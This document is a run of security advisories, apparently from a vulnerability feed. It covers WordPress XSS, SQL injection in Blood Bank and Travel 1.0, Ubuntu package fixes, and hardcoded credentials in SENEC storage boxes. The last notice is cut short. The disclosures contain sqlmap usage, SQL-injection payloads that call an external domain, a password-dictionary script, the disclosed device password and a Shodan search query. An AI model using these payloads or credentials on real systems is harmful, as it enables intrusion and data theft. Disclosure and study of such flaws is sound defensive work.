Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Anton Bond Additional Order Filters for WooCommerce plugin <= 1.10 versions.

**Solution**

 No fix

No patched version is available.

qilin\_99 discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Additional Order Filters for WooCommerce Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47690: WordPress Additional Order Filters for WooCommerce plugin <= 1.10 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.

**CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'remail' parameter in the receiverReg.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

**Vulnerability Details**

*   CVE ID: CVE-2023-46018
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: /receiverReg.php
*   Parameter Name: remail
*   Attack Type: Local

**Description**

*   The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

**Proof of Concept (PoC) :**

*   Save the POST request of receiverReg.php to a request.txt file.

    ---
    POST /bloodbank/file/receiverReg.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
    Content-Length: 877
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/register.php
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rname"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rbg"
    
    A+
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rcity"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rphone"
    
    05555555555
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="remail"
    
    test@test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rpassword"
    
    test123
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rregister"
    
    Register
    -----------------------------2653697510272605730288393868--
    
    ---
    

*   sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
    
*   current database: bloodbank

CVE-2023-46018: GitHub - ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Ubuntu Security Notice 6473-1 - It was discovered that urllib3 didn't strip HTTP Authorization header on cross-origin redirects. A remote attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that urllib3 didn't strip HTTP Cookie header on cross-origin redirects. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6473-1  
November 07, 2023

python-urllib3 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in urllib3.

Software Description:  
- python-urllib3: HTTP library with thread-safe connection pooling

Details:

It was discovered that urllib3 didn't strip HTTP Authorization header  
on cross-origin redirects. A remote attacker could possibly use this  
issue to obtain sensitive information. This issue only affected  
Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2018-25091)

It was discovered that urllib3 didn't strip HTTP Cookie header on  
cross-origin redirects. A remote attacker could possibly use this  
issue to obtain sensitive information. (CVE-2023-43804)

It was discovered that urllib3 didn't strip HTTP body on status code  
303 redirects under certain circumstances. A remote attacker could  
possibly use this issue to obtain sensitive information. (CVE-2023-45803)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   python3-urllib3                 1.26.16-1ubuntu0.1

Ubuntu 23.04:  
   python3-urllib3                 1.26.12-1ubuntu0.1

Ubuntu 22.04 LTS:  
   python3-urllib3                 1.26.5-1~exp1ubuntu0.1

Ubuntu 20.04 LTS:  
   python3-urllib3                 1.25.8-2ubuntu0.3

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   python-urllib3                  1.22-1ubuntu0.18.04.2+esm1  
   python3-urllib3                 1.22-1ubuntu0.18.04.2+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   python-urllib3                  1.13.1-2ubuntu0.16.04.4+esm1  
   python3-urllib3                 1.13.1-2ubuntu0.16.04.4+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6473-1  
   CVE-2018-25091, CVE-2023-43804, CVE-2023-45803

Package Information:  
https://launchpad.net/ubuntu/+source/python-urllib3/1.26.16-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-urllib3/1.26.12-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-urllib3/1.26.5-1~exp1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-urllib3/1.25.8-2ubuntu0.3

Ubuntu Security Notice USN-6473-1

Travel version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: travel-1.0-by-oretnom23 Multiple-SQLi## Author: nu11secur1ty## Date: 11/12/2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-travel-agency-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The search parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'was submitted in the search parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: search (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(selectload_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND'fGlq'='fGlq&searc=&sumbit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 28 columns    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)## Time spent:00:17:00

Travel 1.0 SQL Injection

Ubuntu Security Notice 6467-2 - USN-6467-1 fixed a vulnerability in Kerberos. This update provides the corresponding update for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.04. Robert Morris discovered that Kerberos did not properly handle memory access when processing RPC data through kadmind, which could lead to the freeing of uninitialized memory. An authenticated remote attacker could possibly use this issue to cause kadmind to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6467-2  
November 06, 2023

krb5 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Kerberos could be made to crash if it received specially crafted  
network traffic.

Software Description:  
- krb5: MIT Kerberos Network Authentication Protocol

Details:

USN-6467-1 fixed a vulnerability in Kerberos. This update provides the  
corresponding update for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu  
23.04.

Original advisory details:

Robert Morris discovered that Kerberos did not properly handle memory  
access when processing RPC data through kadmind, which could lead to the  
freeing of uninitialized memory. An authenticated remote attacker could  
possibly use this issue to cause kadmind to crash, resulting in a denial  
of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
krb5-admin-server 1.20.1-1ubuntu0.1  
krb5-kdc 1.20.1-1ubuntu0.1  
krb5-kdc-ldap 1.20.1-1ubuntu0.1  
krb5-otp 1.20.1-1ubuntu0.1  
krb5-pkinit 1.20.1-1ubuntu0.1  
krb5-user 1.20.1-1ubuntu0.1  
libgssapi-krb5-2 1.20.1-1ubuntu0.1  
libgssrpc4 1.20.1-1ubuntu0.1  
libk5crypto3 1.20.1-1ubuntu0.1  
libkadm5clnt-mit12 1.20.1-1ubuntu0.1  
libkadm5srv-mit12 1.20.1-1ubuntu0.1  
libkdb5-10 1.20.1-1ubuntu0.1  
libkrad0 1.20.1-1ubuntu0.1  
libkrb5-3 1.20.1-1ubuntu0.1  
libkrb5support0 1.20.1-1ubuntu0.1

Ubuntu 22.04 LTS:  
krb5-admin-server 1.19.2-2ubuntu0.3  
krb5-kdc 1.19.2-2ubuntu0.3  
krb5-kdc-ldap 1.19.2-2ubuntu0.3  
krb5-otp 1.19.2-2ubuntu0.3  
krb5-pkinit 1.19.2-2ubuntu0.3  
krb5-user 1.19.2-2ubuntu0.3  
libgssapi-krb5-2 1.19.2-2ubuntu0.3  
libgssrpc4 1.19.2-2ubuntu0.3  
libk5crypto3 1.19.2-2ubuntu0.3  
libkadm5clnt-mit12 1.19.2-2ubuntu0.3  
libkadm5srv-mit12 1.19.2-2ubuntu0.3  
libkdb5-10 1.19.2-2ubuntu0.3  
libkrad0 1.19.2-2ubuntu0.3  
libkrb5-3 1.19.2-2ubuntu0.3  
libkrb5support0 1.19.2-2ubuntu0.3

Ubuntu 20.04 LTS:  
krb5-admin-server 1.17-6ubuntu4.4  
krb5-kdc 1.17-6ubuntu4.4  
krb5-kdc-ldap 1.17-6ubuntu4.4  
krb5-otp 1.17-6ubuntu4.4  
krb5-pkinit 1.17-6ubuntu4.4  
krb5-user 1.17-6ubuntu4.4  
libgssapi-krb5-2 1.17-6ubuntu4.4  
libgssrpc4 1.17-6ubuntu4.4  
libk5crypto3 1.17-6ubuntu4.4  
libkadm5clnt-mit11 1.17-6ubuntu4.4  
libkadm5srv-mit11 1.17-6ubuntu4.4  
libkdb5-9 1.17-6ubuntu4.4  
libkrad0 1.17-6ubuntu4.4  
libkrb5-3 1.17-6ubuntu4.4  
libkrb5support0 1.17-6ubuntu4.4

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6467-2  
https://ubuntu.com/security/notices/USN-6467-1  
CVE-2023-36054

Package Information:  
https://launchpad.net/ubuntu/+source/krb5/1.20.1-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.3  
https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.4

Ubuntu Security Notice USN-6467-2

EnBw SENEC Legacy Storage Box versions 1 through 3 suffered from a default credential issue.

Advisory ID:               Ph0s-2023-004  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-1392: Use of Default Credentials

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C  
Overall CVSS Score: 8.6

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CVE-2023-39170  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

The credentials for the senec inverters are known in public.

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. use google to optain them, eg:  
https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Default Credentials

Ubuntu Security Notice 6467-1 - Robert Morris discovered that Kerberos did not properly handle memory access when processing RPC data through kadmind, which could lead to the freeing of uninitialized memory. An authenticated remote attacker could possibly use this issue to cause kadmind to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6467-1  
November 01, 2023

krb5 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Kerberos could be made to crash if it received specially crafted  
network traffic.

Software Description:  
- krb5: MIT Kerberos Network Authentication Protocol

Details:

Robert Morris discovered that Kerberos did not properly handle memory  
access when processing RPC data through kadmind, which could lead to the  
freeing of uninitialized memory. An authenticated remote attacker could  
possibly use this issue to cause kadmind to crash, resulting in a denial  
of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
krb5-admin-server 1.16-2ubuntu0.4+esm1  
krb5-kdc 1.16-2ubuntu0.4+esm1  
krb5-kdc-ldap 1.16-2ubuntu0.4+esm1  
krb5-otp 1.16-2ubuntu0.4+esm1  
krb5-pkinit 1.16-2ubuntu0.4+esm1  
krb5-user 1.16-2ubuntu0.4+esm1  
libgssapi-krb5-2 1.16-2ubuntu0.4+esm1  
libgssrpc4 1.16-2ubuntu0.4+esm1  
libk5crypto3 1.16-2ubuntu0.4+esm1  
libkadm5clnt-mit11 1.16-2ubuntu0.4+esm1  
libkadm5srv-mit11 1.16-2ubuntu0.4+esm1  
libkdb5-9 1.16-2ubuntu0.4+esm1  
libkrad0 1.16-2ubuntu0.4+esm1  
libkrb5-3 1.16-2ubuntu0.4+esm1  
libkrb5support0 1.16-2ubuntu0.4+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
krb5-admin-server 1.13.2+dfsg-5ubuntu2.2+esm4  
krb5-kdc 1.13.2+dfsg-5ubuntu2.2+esm4  
krb5-kdc-ldap 1.13.2+dfsg-5ubuntu2.2+esm4  
krb5-otp 1.13.2+dfsg-5ubuntu2.2+esm4  
krb5-pkinit 1.13.2+dfsg-5ubuntu2.2+esm4  
krb5-user 1.13.2+dfsg-5ubuntu2.2+esm4  
libgssapi-krb5-2 1.13.2+dfsg-5ubuntu2.2+esm4  
libgssrpc4 1.13.2+dfsg-5ubuntu2.2+esm4  
libk5crypto3 1.13.2+dfsg-5ubuntu2.2+esm4  
libkadm5clnt-mit9 1.13.2+dfsg-5ubuntu2.2+esm4  
libkadm5srv-mit9 1.13.2+dfsg-5ubuntu2.2+esm4  
libkdb5-8 1.13.2+dfsg-5ubuntu2.2+esm4  
libkrad0 1.13.2+dfsg-5ubuntu2.2+esm4  
libkrb5-3 1.13.2+dfsg-5ubuntu2.2+esm4  
libkrb5support0 1.13.2+dfsg-5ubuntu2.2+esm4

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
krb5-admin-server 1.12+dfsg-2ubuntu5.4+esm4  
krb5-kdc 1.12+dfsg-2ubuntu5.4+esm4  
krb5-kdc-ldap 1.12+dfsg-2ubuntu5.4+esm4  
krb5-otp 1.12+dfsg-2ubuntu5.4+esm4  
krb5-pkinit 1.12+dfsg-2ubuntu5.4+esm4  
krb5-user 1.12+dfsg-2ubuntu5.4+esm4  
libgssapi-krb5-2 1.12+dfsg-2ubuntu5.4+esm4  
libgssrpc4 1.12+dfsg-2ubuntu5.4+esm4  
libk5crypto3 1.12+dfsg-2ubuntu5.4+esm4  
libkadm5clnt-mit9 1.12+dfsg-2ubuntu5.4+esm4  
libkadm5srv-mit8 1.12+dfsg-2ubuntu5.4+esm4  
libkadm5srv-mit9 1.12+dfsg-2ubuntu5.4+esm4  
libkdb5-7 1.12+dfsg-2ubuntu5.4+esm4  
libkrad0 1.12+dfsg-2ubuntu5.4+esm4  
libkrb5-3 1.12+dfsg-2ubuntu5.4+esm4  
libkrb5support0 1.12+dfsg-2ubuntu5.4+esm4

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6467-1  
CVE-2023-36054

Ubuntu Security Notice USN-6467-1

EnBw SENEC Legacy Storage Box versions 1 through 3 appear to suffer from a hardcoded credential vulnerability.

Advisory ID:               Ph0s-2023-003  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-307: Improper Restriction of Excessive 

                           Authentication Attempts  
                           CWE-798: Use of Hard-coded Credentials

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C  
Overall CVSS Score: 8.6

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CVE-2023-39168  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

Based on the previously identified hard-coded username in CVE-2023-39167 and  
CVE-2023-39168 all technical requirements were met to target the password. 

Since the username installateur is quite straightforward in the sense of 

guessable, it was decided to perform a dictonary-type brute force attack. 

For this purpose, all related PDF documents were downloaded to create a password  
list specifically tailored to SENEC.Inverter. 

Source of the Documents: https://senec.com/au/company/downloads

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. parse the documents :  
import argparse  
import glob  
import string  
import fitz

def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):  
    pdf_text = ""  
    for file in glob.glob(f"{pdf_directory}/*.pdf"):  
        pdf = fitz.open(file)  
        for page in pdf:  
            pdf_text += page.get_text()

    pdf_words = set(  
        [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()]  
    )  
    senec_password = set(  
        [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()]  
    )

    with open("senec-password.txt", mode="w", encoding="utf-8") as fd:  
        fd.write('\n'.join(senec_password))

if __name__ == '__main__':  
    parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary")  
    parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False,  
                        help="pdf storage location")  
    parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False,  
                        help="password prefix")  
    parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False,  
                        help="password suffix")  
    args = parser.parse_args()  
    get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)

2. work with the output:  
The Python script extracts all words from all PDF documents and allows to add a prefix  
and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix} ,  
such as the following:  
***** cut *******  
Senecmoribundity  
SenecCleaning  
Senecdusts  
Senecclinical  
Senecaggregation  
Senecstubborn  
Senecstorages  
SenecDecommissioning  
SenecInstall  
Senecmany  
***** cut ********

3) use the list within burpsuite  
The password lists were then used in Burp Suite Professional, a tool 

specifically designed for web application security testing, to perform an 

automated brute force attack.  
The list shown above as an excerpt with the prefix Senec and no suffix was 

finally successful in executing the attack.  
It could be determined that the password "SenecInstall" is valid for all  
SENEC.Inverter devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Hardcoded Credentials

EnBw SENEC Legacy Storage Box versions 1 through 3 appear to expose a management interface that can be accessed with hardcoded credentials.

Advisory ID:               Ph0s-2023-005  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-923: Improper Restriction of Communication 

                           Channel to Intended Endpoints

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L (7.4 High)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:H/RL:T/RC:C  
Overall CVSS Score: 7.2

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CCVE-2023-39171  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

The management interface of the SENEC.Inverter is publicly accessible via the  
Internet. This circumstance is recommended by the manufacturer and customers are  
advised to open the necessary ports to enable remote maintenance.  
As a result, anyone who manages to detect and successfully exploit security  
vulnerabilities in SENEC.Inverter, for instance the authors of this report, can  
access and compromise all devices available on the internet without 

restrictions. To achieve this,it is possible to use an IoT search engine such as  
Shodan to automatically obtain an up-to-date list of IP addresses of all devices  
in just a few seconds.

Besides Shodan, there are other IoT search engines such as Censys or ZoomEye to  
complement the list even further.  
Consequently, it is very easy for an attacker to develop an exploit script for  
the automated compromise of all SENEC.Inverter devices, e.g. to simul-  
taneously shut down all appliances or to damage them through a targeted  
overload. For this purpose, only the hard-coded credentials previously 

identified in findings CVE-2023-39168 and CVE-2023-39169 need to be used in  
conjunction with SENEC.Inverter’s built-in API.

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. use the shodan dork to obtain management-interfaces.  
(no longer valid, patched by manufacturer)

https://www.shodan.io/search?query=http.html%3A%3Ctitle%3ESENEC%3C%2Ftitle%  
3E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Exposed Interface

Ubuntu Security Notice 6466-1 - Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel contained a race condition during device removal, leading to a use-after- free vulnerability. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code. Hyunwoo Kim discovered that the Technotrend/Hauppauge USB DEC driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6466-1  
October 31, 2023

linux-nvidia-6.2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-nvidia-6.2: Linux kernel for NVIDIA systems

Details:

